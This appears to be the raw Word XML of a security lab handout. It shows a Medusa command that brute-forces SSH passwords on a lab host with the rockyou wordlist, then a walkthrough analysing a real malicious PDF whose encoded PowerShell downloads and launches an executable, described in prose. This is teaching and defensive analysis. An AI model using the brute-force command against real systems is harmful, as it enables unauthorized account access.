      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009C6915">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t>gunzip /usr/share/wordlists/rockyou.txt.gz</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D4212FD" w14:textId="4142AE4E" w:rsidR="009C6915" w:rsidRDefault="009C6915" w:rsidP="00337E4E">
      <w:r>
        <w:t>Once the dictionary is unzipped, we can use it with Medusa.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54D904A5" w14:textId="1C799002" w:rsidR="009C6915" w:rsidRDefault="009C6915" w:rsidP="00337E4E">
      <w:r>
        <w:t>With this tool, we will supply the following arguments (should all be on one line):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2BA8A713" w14:textId="05E16EF3" w:rsidR="009C6915" w:rsidRPr="009C6915" w:rsidRDefault="009C6915" w:rsidP="00337E4E">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009C6915">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t>medusa -U users2.txt -P /usr/share/wordlists/rockyou.txt -M ssh -h 192.168.56.101</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t xml:space="preserve"> -O success.txt</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76D42974" w14:textId="1FC5F17B" w:rsidR="009C6915" w:rsidRDefault="009C6915" w:rsidP="00337E4E">
      <w:r>
        <w:t>With the above, the following argument mean:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07CDAFEA" w14:textId="782B7601" w:rsidR="009C6915" w:rsidRDefault="009C6915" w:rsidP="00337E4E">
      <w:r>
        <w:t>-U for a list of users (a single user would be -u, or lower case)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A4A0CF7" w14:textId="77777777" w:rsidR="009C6915" w:rsidRDefault="009C6915" w:rsidP="00337E4E">
      <w:r>
        <w:t>-P for a list of passwords (a single password would be -p, or lower case)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74BF24D8" w14:textId="77777777" w:rsidR="009C6915" w:rsidRDefault="009C6915" w:rsidP="00337E4E">
      <w:r>
        <w:t>-M is for the module, or protocol.  We are attacking the SSH protocol</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1AC14662" w14:textId="30ABE055" w:rsidR="009C6915" w:rsidRDefault="009C6915" w:rsidP="00337E4E">
      <w:r>
        <w:t xml:space="preserve">-h for the host (if we had a list of hosts, we would use upper case H) </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4CC9F85E" w14:textId="0C1E534E" w:rsidR="00210700" w:rsidRDefault="00210700" w:rsidP="00337E4E">
      <w:r>
        <w:t>-O to output the results to be stored to a text file (upper case of letter O, not number zero)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69CE92B2" w14:textId="026E7D1B" w:rsidR="009C6915" w:rsidRDefault="009C6915" w:rsidP="00337E4E">
      <w:r>
        <w:t>When we type the above, we find that the passwords are revealed.  Please note that these are real world tools with real world files, and they do contain profanity.  Sanitizing them doesn’t help in the future you in the future; if you use an incomplete toolkit, you won’t get complete results.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63C216E6" w14:textId="6420DA8F" w:rsidR="00210700" w:rsidRDefault="00210700" w:rsidP="00337E4E">
      <w:r>
        <w:t>We can review the results of our crack with the cat command:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B6D8ED7" w14:textId="3BBB15C4" w:rsidR="00210700" w:rsidRPr="00210700" w:rsidRDefault="00210700" w:rsidP="00337E4E">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00210700">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t>cat success.txt</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="133ED327" w14:textId="461EB954" w:rsidR="00210700" w:rsidRDefault="00210700" w:rsidP="00337E4E">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="23B89E2A" wp14:editId="792D0782">
            <wp:extent cx="5943600" cy="1556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6385"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D0ED092" w14:textId="5C64433C" w:rsidR="00210700" w:rsidRDefault="00210700" w:rsidP="00337E4E"/>
    <w:p w14:paraId="0D74389B" w14:textId="3EAC43B0" w:rsidR="00210700" w:rsidRDefault="00210700">
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="71AD854F" w14:textId="310B45DE" w:rsidR="00210700" w:rsidRDefault="00210700" w:rsidP="00210700">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Malware Analysis</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="188410D8" w14:textId="6CE14390" w:rsidR="00210700" w:rsidRDefault="00210700" w:rsidP="00337E4E">
      <w:r>
        <w:t>Now that we have successfully audited our server, and discovered vulnerabilities to be exploited, let’s look at understanding some basic malware.  One of the more common methods of distributing malware is to embed them in documents such as Microsoft Office documents or PDF documents.  We will look at PDF documents today:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18E9E2E7" w14:textId="5383D69F" w:rsidR="00210700" w:rsidRDefault="008274AB" w:rsidP="00337E4E">
      <w:r>
        <w:t>With PDF documents, they are text documents that are a collection of objects.  This makes analysis easy:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03CD74D2" w14:textId="795C66A5" w:rsidR="008274AB" w:rsidRDefault="008274AB" w:rsidP="00337E4E">
      <w:r w:rsidRPr="008274AB">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="6831C968" wp14:editId="01E01D9F">
            <wp:extent cx="5943600" cy="2971800"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="11" name="Picture 3">
              <a:extLst xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E146FE62-C185-47D8-916C-86CD104285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146FE62-C185-47D8-916C-86CD10428575}"/>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5943600" cy="2971800"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="68DAB3FC" w14:textId="7756C830" w:rsidR="008274AB" w:rsidRDefault="008274AB" w:rsidP="00337E4E">
      <w:r>
        <w:t>Some of the risky object types we can find in our PDF document include:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72C6EACA" w14:textId="77777777" w:rsidR="008274AB" w:rsidRPr="008274AB" w:rsidRDefault="008274AB" w:rsidP="008274AB">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="008274AB">
        <w:t>Embedded JavaScript: /JS, /JavaScript, /XFA</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="542A3633" w14:textId="77777777" w:rsidR="008274AB" w:rsidRPr="008274AB" w:rsidRDefault="008274AB" w:rsidP="008274AB">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="008274AB">
        <w:t>Embedded Flash: /RichMedia</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="726E353D" w14:textId="77777777" w:rsidR="008274AB" w:rsidRPr="008274AB" w:rsidRDefault="008274AB" w:rsidP="008274AB">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="008274AB">
        <w:t>Embedded or external programs: /Launch, /EmbeddedFiles</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="574ADD9C" w14:textId="6472EBCE" w:rsidR="008274AB" w:rsidRDefault="008274AB" w:rsidP="008274AB">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="008274AB">
        <w:t>Interaction with websites: /URI, /SubmitForm</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27CD1F78" w14:textId="23E1A68D" w:rsidR="008274AB" w:rsidRDefault="008274AB" w:rsidP="008274AB">
      <w:r>
        <w:t>The inclusion of the above elements doesn’t necessarily indicate malware, but they can be indicators.  Some other indicators are:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22BF2ACB" w14:textId="1144D2F2" w:rsidR="008274AB" w:rsidRDefault="008274AB" w:rsidP="008274AB">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Single page</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="185D5759" w14:textId="35D8C4C4" w:rsidR="008274AB" w:rsidRDefault="008274AB" w:rsidP="008274AB">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>OpenAction</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73C66CBD" w14:textId="3D8C9234" w:rsidR="008274AB" w:rsidRDefault="008274AB" w:rsidP="008274AB">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>AcroForm</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B5A20B6" w14:textId="0D966E58" w:rsidR="008274AB" w:rsidRDefault="008274AB" w:rsidP="008274AB">
      <w:r>
        <w:t>Again, these indicators aren’t absolute, just indicators that we need to probably do more research</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F13E19C" w14:textId="1A483B7A" w:rsidR="008274AB" w:rsidRDefault="008274AB" w:rsidP="008274AB">
      <w:r>
        <w:t xml:space="preserve">One of the first attacks we can do is to look at the </w:t>
      </w:r>
      <w:r w:rsidR="00CF7A38">
        <w:t>text of the document.  Very quickly we can see suspicious content.  I have included a virus for you to analyze.  Please keep in mind this is a real virus taken from the wild, with a real payload that can be exploited if detonated on a client machine.  We are analyzing this in Linux so it is less risky, however, like the dictionaries above, this isn’t a sanitized object, this is a real world artifact.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="601E792E" w14:textId="6C60CE94" w:rsidR="00CF7A38" w:rsidRDefault="00CF7A38" w:rsidP="008274AB">
      <w:r>
        <w:t xml:space="preserve">Most people who do malware research share their discoveries with others or sites like VirusTotal.com.  When sharing amongst their peers, they have to zip them up with a password so anitimalware programs </w:t>
      </w:r>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>such as Microsoft Defender don’t detect them and delete the malware.  To unarchive or unzip this malware, you will need to do the following:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58E1F176" w14:textId="7A7EB59A" w:rsidR="00CF7A38" w:rsidRPr="00CF7A38" w:rsidRDefault="00CF7A38" w:rsidP="008274AB">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CF7A38">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t>cd ~/malware</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A09DEA9" w14:textId="0C9EB2E1" w:rsidR="00CF7A38" w:rsidRPr="00CF7A38" w:rsidRDefault="00CF7A38" w:rsidP="008274AB">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CF7A38">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t>ls</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F4114FD" w14:textId="60C59830" w:rsidR="00CF7A38" w:rsidRPr="00CF7A38" w:rsidRDefault="00CF7A38" w:rsidP="008274AB">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CF7A38">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t>unzip ctk.zip</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="176C4D05" w14:textId="367F81CC" w:rsidR="00CF7A38" w:rsidRDefault="00CF7A38" w:rsidP="008274AB">
      <w:r>
        <w:t>you will be prompted for a password, the password is malware</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54A34F3E" w14:textId="013DC2C3" w:rsidR="00CF7A38" w:rsidRDefault="00CF7A38" w:rsidP="008274AB">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="39656BF0" wp14:editId="2C1BE6DA">
            <wp:extent cx="5943600" cy="4469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69130"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="324BF97C" w14:textId="6BC92846" w:rsidR="00CF7A38" w:rsidRDefault="00CF7A38" w:rsidP="008274AB">
      <w:r>
        <w:t>Once you have the malware unzipped, you can review it with the cat command, the nano command, or if and only if you are comfortable with vi, the vi command.  All will show you content that is suspicious:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F1AF1B4" w14:textId="24F13AF1" w:rsidR="00CF7A38" w:rsidRDefault="00CF7A38" w:rsidP="008274AB">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="117F0E06" wp14:editId="3E1ACB2C">
            <wp:extent cx="5943600" cy="3360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0420"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="43718A96" w14:textId="77C0FB54" w:rsidR="00CF7A38" w:rsidRDefault="00CF7A38" w:rsidP="008274AB">
      <w:r>
        <w:t>Let’s look deeper:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4176CD36" w14:textId="7481AD67" w:rsidR="00CF7A38" w:rsidRDefault="00CF7A38" w:rsidP="008274AB">
      <w:r>
        <w:t>Clearly this virus is trying to launch something on the OpenAction event, looks like it is trying to start something with PowerShell, but what it is looks like gibberish.  What you are seeing is encoded text inside a powershell call.  We can decode this text with the base64dump command, a standard tool in many malware analysis toolkits like REMnux:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2DE641E1" w14:textId="6161332A" w:rsidR="00CF7A38" w:rsidRDefault="00CF7A38" w:rsidP="008274AB">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="6A3C82F9" wp14:editId="2133F596">
            <wp:extent cx="5943600" cy="2106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06930"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="68F4AA85" w14:textId="35BCDFC8" w:rsidR="00CF7A38" w:rsidRDefault="00CF7A38" w:rsidP="008274AB">
      <w:r>
        <w:t>Please note, in the document the suspicious payload was in Object 1, however in the output of base64dump, the suspicious payload is in ID 2.  Knowing this, we can use base64dump to decode this text with the following:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29E1BC2C" w14:textId="66521F1B" w:rsidR="00CF7A38" w:rsidRDefault="009C4085" w:rsidP="008274AB">
      <w:r>
        <w:t>base64dump.py ctk.pdf -s 2 -S</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77804771" w14:textId="2E67B20C" w:rsidR="009C4085" w:rsidRDefault="009C4085" w:rsidP="008274AB">
      <w:r>
        <w:t>where:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B26543E" w14:textId="09FABB78" w:rsidR="009C4085" w:rsidRDefault="009C4085" w:rsidP="008274AB">
      <w:r>
        <w:t>-s 2 is to identify the section or ID we wish to decode (lower case S)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B47D52C" w14:textId="72F69D8B" w:rsidR="009C4085" w:rsidRDefault="009C4085" w:rsidP="008274AB">
      <w:r>
        <w:t>-S (upper case S) to output the results as ASCII</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A06CB1D" w14:textId="0127FDCA" w:rsidR="009C4085" w:rsidRDefault="009C4085" w:rsidP="008274AB">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="2383CDBE" wp14:editId="405B1456">
            <wp:extent cx="5943600" cy="1692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2275"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="763FD9FD" w14:textId="72C74E34" w:rsidR="009C4085" w:rsidRDefault="009C4085" w:rsidP="008274AB">
      <w:r>
        <w:t>With the above, we see that:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60E257A7" w14:textId="0EDD1981" w:rsidR="009C4085" w:rsidRPr="009C4085" w:rsidRDefault="009C4085" w:rsidP="009C4085">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="009C4085">
        <w:t xml:space="preserve">Powershell </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">is launched and </w:t>
      </w:r>
      <w:r w:rsidRPr="009C4085">
        <w:t>does the following:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66497FA0" w14:textId="77777777" w:rsidR="009C4085" w:rsidRPr="009C4085" w:rsidRDefault="009C4085" w:rsidP="009C4085">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="5"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="009C4085">
        <w:t>Bypasses execution policy</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2CB214C9" w14:textId="77777777" w:rsidR="009C4085" w:rsidRPr="009C4085" w:rsidRDefault="009C4085" w:rsidP="009C4085">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="5"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="009C4085">
        <w:t>Runs in a hidden window</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46D43FEE" w14:textId="77777777" w:rsidR="009C4085" w:rsidRPr="009C4085" w:rsidRDefault="009C4085" w:rsidP="009C4085">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="5"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="009C4085">
        <w:t>Launches a WebClient</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57A5704A" w14:textId="77777777" w:rsidR="009C4085" w:rsidRPr="009C4085" w:rsidRDefault="009C4085" w:rsidP="009C4085">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="5"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="009C4085">
        <w:t>Downloads an executable to the users AppData folder</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="631013FB" w14:textId="292A624E" w:rsidR="009C4085" w:rsidRDefault="009C4085" w:rsidP="009C4085">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="009C4085">
        <w:t>Launches the executable</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A0A1CE8" w14:textId="28DFE8DC" w:rsidR="009C4085" w:rsidRDefault="009C4085" w:rsidP="009C4085">
      <w:r>
        <w:t>There are other analysis we can do.  We can use tools like peepdf and pdfid to analyze our suspicious file:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30F510FF" w14:textId="4F546F66" w:rsidR="009C4085" w:rsidRDefault="009C4085" w:rsidP="009C4085">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="754279B6" wp14:editId="59513B74">
            <wp:extent cx="3552825" cy="50319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825" cy="5031960"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="13FAC62E" w14:textId="097B941F" w:rsidR="009C4085" w:rsidRDefault="009C4085" w:rsidP="009C4085">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>With pdfid, we see some suspicious indicators, the single page, the including of an OpenAction event type, and a Launch event.  When we look at the malware with peepdf, we see some more info, including some MD5 and SHA1 hashes we can use for research on VirusTotal.com:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E108F61" w14:textId="64EE3144" w:rsidR="009C4085" w:rsidRDefault="009C4085" w:rsidP="009C4085">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="5EB5F562" wp14:editId="280A2952">
            <wp:extent cx="5391150" cy="690879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729" cy="6931317"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="20E4ECE6" w14:textId="496C6463" w:rsidR="009C4085" w:rsidRDefault="009C4085" w:rsidP="009C4085">
      <w:r>
        <w:t>On VirusTotal, we have pretty clear indicators that this is malware:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E54114A" w14:textId="2CA9EE52" w:rsidR="009C4085" w:rsidRDefault="009C4085" w:rsidP="009C4085">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="3EED1D34" wp14:editId="71C84FCA">
            <wp:extent cx="5943600" cy="3608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8705"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E289609" w14:textId="327906E3" w:rsidR="009C4085" w:rsidRPr="00337E4E" w:rsidRDefault="009C4085" w:rsidP="009C4085">
      <w:r>
        <w:t>Again, please be careful with this.  While the malware is quite dated, and unlikely to work on a modern Windows system, it is, as you can see above, a real computer contaminant.  Assume it is dangerous and govern yourself accordingly.</w:t>
      </w:r>
    </w:p>
    <w:sectPr w:rsidR="009C4085" w:rsidRPr="00337E4E" w:rsidSect="00B048ED">
      <w:pgSz w:w="12240" w:h="15840"/>
      <w:pgMar w:top="81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922C6"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="717E52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A75AFF"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="7D94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48E3"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="E7E2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D10D45"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="796205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69F1569"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="2BA244C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561"/>
    <w:rsid w:val="000A0CD2"/>
    <w:rsid w:val="0020681E"/>
    <w:rsid w:val="00210700"/>
    <w:rsid w:val="00242E5E"/>
    <w:rsid w:val="002B67A6"/>
    <w:rsid w:val="00324F57"/>
    <w:rsid w:val="00337E4E"/>
    <w:rsid w:val="00355CE4"/>
    <w:rsid w:val="004413EB"/>
    <w:rsid w:val="004912F2"/>
    <w:rsid w:val="006111F2"/>
    <w:rsid w:val="00686000"/>
    <w:rsid w:val="00790561"/>
    <w:rsid w:val="007D3313"/>
    <w:rsid w:val="007E561D"/>
    <w:rsid w:val="008274AB"/>
    <w:rsid w:val="009161A6"/>
    <w:rsid w:val="00924712"/>
    <w:rsid w:val="00963603"/>
    <w:rsid w:val="00965373"/>
    <w:rsid w:val="009C4085"/>
    <w:rsid w:val="009C6915"/>
    <w:rsid w:val="009E1012"/>
    <w:rsid w:val="00B048ED"/>
    <w:rsid w:val="00B3618E"/>
    <w:rsid w:val="00BC548F"/>
    <w:rsid w:val="00C82D5E"/>
    <w:rsid w:val="00CF7A38"/>
    <w:rsid w:val="00D604BC"/>
    <w:rsid w:val="00DD35D6"/>
    <w:rsid w:val="00E57B89"/>
    <w:rsid w:val="00F07B4C"/>
    <w:rsid w:val="00FE7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2BC10"/>
  <w15:docId w15:val="{DF4D0B4B-D261-4D85-95BA-AF415E040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6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561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0561"/>
    <w:rPr>
      <w:color w:val="0000FF"/>
      <w:u w:val="single"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="ListParagraph">
    <w:name w:val="List Paragraph"/>
    <w:basedOn w:val="Normal"/>
    <w:uiPriority w:val="34"/>
    <w:qFormat/>
    <w:rsid w:val="00790561"/>
    <w:pPr>
      <w:ind w:left="720"/>
      <w:contextualSpacing/>
    </w:pPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="Heading1Char">
    <w:name w:val="Heading 1 Char"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:link w:val="Heading1"/>
    <w:uiPriority w:val="9"/>
    <w:rsid w:val="007E56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561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653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373"/>
    <w:rPr>
      <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
      <w:sz w:val="18"/>
      <w:szCs w:val="18"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="UnresolvedMention">
    <w:name w:val="Unresolved Mention"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="004912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135484">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
      <w:divsChild>
        <w:div w:id="1022122706">
          <w:marLeft w:val="1166"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="134"/>
          <w:marBottom w:val="0"/>
          <w:divBdr>
